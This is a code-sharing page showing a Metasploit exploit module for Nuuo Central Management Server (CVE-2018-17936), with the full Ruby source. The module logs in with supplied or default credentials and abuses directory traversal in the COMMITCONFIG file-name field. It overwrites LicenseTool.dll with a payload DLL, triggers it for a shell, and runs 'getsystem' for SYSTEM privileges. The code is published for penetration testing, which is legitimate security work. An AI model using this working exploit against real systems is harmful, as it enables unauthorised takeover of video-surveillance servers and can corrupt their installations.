Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
19778 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ManualRanking

8


9
  include Msf::Exploit::EXE

10
  include Msf::Exploit::Remote::Nuuo

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => "Nuuo Central Management Server Authenticated Arbitrary File Upload",

17
        'Description' => %q{

18
          The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the

19
          CMS Server.

20
          The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\..\)

21
          characters. Therefore, this function can be abused to overwrite any files in the installation

22
          drive of CMS Server.

23


24
          This vulnerability is exploitable in CMS versions up to and including v2.4.

25


26
          This module will either use a provided session number (which can be guessed with an auxiliary

27
          module) or attempt to login using a provided username and password - it will also try the

28
          default credentials if nothing is provided.

29


30
          This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module

31
          fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will

32
          not execute successfully.

33
        },

34
        'License' => MSF_LICENSE,

35
        'Author' => [

36
          'Pedro Ribeiro <[email protected]>' # Vulnerability discovery and Metasploit module

37
        ],

38
        'References' => [

39
          [ 'CVE', '2018-17936' ],

40
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],

41
          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],

42
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-cms-ownage.txt' ]

43
        ],

44
        'Platform' => 'win',

45
        'Arch' => ARCH_X86,

46
        'Targets' => [

47
          [ 'Nuuo Central Management Server <= v2.4.0', {} ],

48
        ],

49
        'Privileged' => true,

50
        'DisclosureDate' => '2018-10-11',

51
        'DefaultTarget' => 0,

52
        'Compat' => {

53
          'Meterpreter' => {

54
            'Commands' => %w[

55
              stdapi_sys_process_execute

56
              stdapi_sys_process_get_processes

57
              stdapi_sys_process_kill

58
            ]

59
          }

60
        },

61
        'Notes' => {

62
          'Reliability' => UNKNOWN_RELIABILITY,

63
          'Stability' => UNKNOWN_STABILITY,

64
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

65
        }

66
      )

67
    )

68


69
    self.needs_cleanup = true

70
  end

71


72
  def on_new_session(client)

73
    if client.type == 'meterpreter'

74
      print_warning('Please wait a bit while we clean up')

75
      client.sys.process.get_processes().each do |proc|

76
        if proc['name'] == 'NCS_Server.exe'

77
          client.sys.process.kill(proc['pid'])

78
          Rex.sleep(5)

79
          client.shell_command_token("move /y #{@dll} LicenseTool.dll")

80
          client.sys.process.execute('NCS_Server.exe')

81
          print_good('Successfully restored LicenseTool.dll!')

82
        end

83
      end

84


85
      # elevate privs to system (we're already Admin anyway), and we're done!

86
      client.run_cmd('getsystem')

87
      print_good('We should have SYSTEM now, enjoy your shell!')

88
    else

89
      print_error('You are not using meterpreter, so we are unable to restore LicenseTool.dll')

90
      print_error("To restore it, kill the NCS_Server.exe process and copy <CMS_FOLDER>\\#{@dll} to <CMS_FOLDER>\\LicenseTool.dll")

91
      print_error('... otherwise the Nuuo CMS installation will be nuked!')

92
      print_good('Anyway, enjoy your shell!')

93
    end

94
  end

95


96
  def upload_file(filename, data)

97
    res = ncs_send_request({

98
      'method' => 'COMMITCONFIG',

99
      'file_name' => "..\\..\\#{filename}",

100
      'user_session' => user_session,

101
      'data' => data

102
    })

103
  end

104


105
  def exploit

106
    connect

107
    res = ncs_login

108
    fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS') unless res

109


110
    # Download and upload a backup of LicenseTool.dll, so that we can restore it at post

111
    # and not nuke the CMS installation.

112
    @dll = rand_text_alpha(12)

113
    print_status("Backing up LicenseTool.dll to #{@dll}")

114


115
    ltool = 'LicenseTool.dll'

116
    res = ncs_send_request({

117
      'method' => 'GETCONFIG',

118
      'file_name' => "..\\..\\#{ltool}",

119
      'user_session' => user_session

120
    })

121
    dll_data = res.body

122


123
    upload_file(@dll, dll_data)

124


125
    print_status('Uploading payload...')

126
    upload_file(ltool, generate_payload_dll)

127


128
    print_status('Sleeping 15 seconds...')

129
    Rex.sleep(15)

130


131
    print_status('Sending SENDLICFILE request, shell incoming!')

132
    res = ncs_send_request({

133
      'method' => 'SENDLICFILE',

134
      'file_name' => "#{rand_text_alpha(3..11)}.lic",

135
      'user_session' => user_session,

136
      'data' => rand_text_alpha(50..350)

137
    })

138
  end

139
end

140


141